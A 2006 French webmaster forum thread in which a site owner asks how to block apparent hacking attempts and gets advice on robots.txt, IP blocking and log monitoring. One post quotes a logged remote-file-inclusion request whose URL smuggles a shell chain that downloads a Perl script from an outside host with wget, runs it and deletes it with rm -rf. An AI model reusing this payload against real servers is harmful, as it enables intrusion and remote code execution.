tentative de piratage encours

Consultez la formation au référencement naturel Google de WebRankInfo / Ranking Metrics

istreen
 

tentative de piratage encours

Message le Mer Aoû 30, 2006 20:44

Bonsoir, depuis quelques jours j'ai un code que g trouver sur le net qui enregister les informations suivante.
Code: Tout sélectionner
30 Aug 30 2006 9:37:01 pm CEST

82.221.42.7 tried to load url

User Agent = libwww-perl/5.803

Yes you have been bagged and tagged for a making an illegal move




J'ai mené mon enquete, et je continue, mais je cherchais surtout a blocker ce ptin de robots.

Voila ma solution
User-agent: libwww-perl
Disallow: /

Cela ne generas pas google et les autres moteurs ?

istreen
 

Message le Mer Aoû 30, 2006 20:56

les attaques on etais bloqués apparement.


Serious
WRInaute accro
WRInaute accro
 
Messages: 2438
Inscription: Lun Nov 21, 2005 18:29

Message le Mer Aoû 30, 2006 21:02

Si tu as pu bloquer un agent avec robots.txt, c'est que ce n'etait pas une attaque. Ou que c'est un debutant.

D'apres mes souvenirs un parametre de cette lib permet d'ignorer le fichier robots.txt.

istreen
 

Message le Mer Aoû 30, 2006 21:26

Dans tous les cars c bloqué, apparement ct une attaque avec nombreux serveur avec un worm.

enfin vivement que je sécurise tous ca

istreen
 

Message le Jeu Aoû 31, 2006 7:48

C'est reparti avec une attaque manuel, c'est plus un user agent.

C'est ip qui appartienne a
inetnum: 0.0.0.0 - 255.255.255.255
netname: IANA-BLK
descr: The whole IPv4 address space
country: EU # Country is really world wide
org: ORG-IANA1-RIPE
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
status: ALLOCATED UNSPECIFIED "status:" definitions
remarks: The country is really worldwide.
remarks: This address space is assigned at various other places in
remarks: the world and might therefore not be in the RIPE database.
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: RIPE-NCC-HM-MNT
mnt-routes: RIPE-NCC-RPSL-MNT
source: RIPE # Filtered

organisation: ORG-IANA1-RIPE
org-name: Internet Assigned Numbers Authority
org-type: IANA
address: see http://www.iana.org
remarks: The IANA allocates IP addresses and AS number blocks to RIRs
remarks: see http://www.iana.org/ipaddress/ip-addresses.htm
remarks: and http://www.iana.org/assignments/as-numbers
e-mail: bitbucket@ripe.net
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered

role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
e-mail: bitbucket@ripe.net
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
nic-hdl: IANA1-RIPE
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: RIPE-NCC-MNT
source: RIPE # Filtered


J'aimerais bloquer les plages d'ip venant d'eux.

Sir Dipp
WRInaute accro
WRInaute accro
 
Messages: 1025
Inscription: Lun Juil 21, 2003 17:53

Message le Jeu Aoû 31, 2006 7:50

Tu peux y aller, la plage d'IP c'est celle-ci : inetnum: 0.0.0.0 - 255.255.255.255

:-)

istreen
 

Message le Jeu Aoû 31, 2006 8:01

cela ne pas empecher que mon site soit vu ?
Je bloke les ip comment avec le .htaccess

Sir Dipp
WRInaute accro
WRInaute accro
 
Messages: 1025
Inscription: Lun Juil 21, 2003 17:53

Message le Jeu Aoû 31, 2006 8:17

Ben disons que la plage d'IP en question c'est toutes les IPs donc ton site sera visible par plus personne, de plus le pirate doit sûrement passer par un proxy alors son IP sera fausse.

Sinon est-ce que tu es sûr que c'est bien une attaque pirate ?

istreen
 

Message le Jeu Aoû 31, 2006 8:20

si ca ce n'est pas une attaque pirate alors.

Code: Tout sélectionner
31 Aug 31 2006 3:23:51 am CEST

201.226.254.210 tried to load /includes/adminBoards.php?GlobalSettings[templatesDirectory]=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*?

User Agent = Mozilla/5.0

Yes you have been bagged and tagged for a making an illegal move





j'en ai relevé pret de 300 avant hier.
depuis que g bloqué le user agent il sont niké.
Mais c reparti avec une autre attaque sur une plage d'ip importante
Dernière édition par istreen le Jeu Aoû 31, 2006 9:47, édité 2 fois.

Sir Dipp
WRInaute accro
WRInaute accro
 
Messages: 1025
Inscription: Lun Juil 21, 2003 17:53

Message le Jeu Aoû 31, 2006 8:30

Si c'est toujours la même IP bloque l'IP, puis continue à garder un oeil sur tes logs, s'ils change tu changes aussi, ils finiront par abandonner.

Sinon, active le safe_mode pendant le temps de l'attaque sur ton serveur.

A+

istreen
 

Message le Jeu Aoû 31, 2006 8:34

Safe mode on c'est pas une faille ?

istreen
 

Message le Jeu Aoû 31, 2006 8:41

ta cliqué dessus lol g eu une alerte intrusion avec ton ip de neuf telecom.
bon heureusement que g vu la provonance du click :p

istreen
 

Message le Jeu Aoû 31, 2006 8:57

Ne cliquez pas dessus, cela m'envoie une alerte avec toutes les infos.
et je voudrais eviter d'envoyer au service abuse de votre fai.

i-liquid
WRInaute passionné
WRInaute passionné
 
Messages: 662
Inscription: Jeu Sep 08, 2005 17:51

Message le Jeu Aoû 31, 2006 10:20

istreen a écrit:Ne cliquez pas dessus, cela m'envoie une alerte avec toutes les infos.
et je voudrais eviter d'envoyer au service abuse de votre fai.


ne pas cliquer sur?

istreen
 

Message le Jeu Aoû 31, 2006 10:31

ben sur le lien, mais je l'ai viré.


Formation recommandée sur ce thème :

Formation Référencement naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :



Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités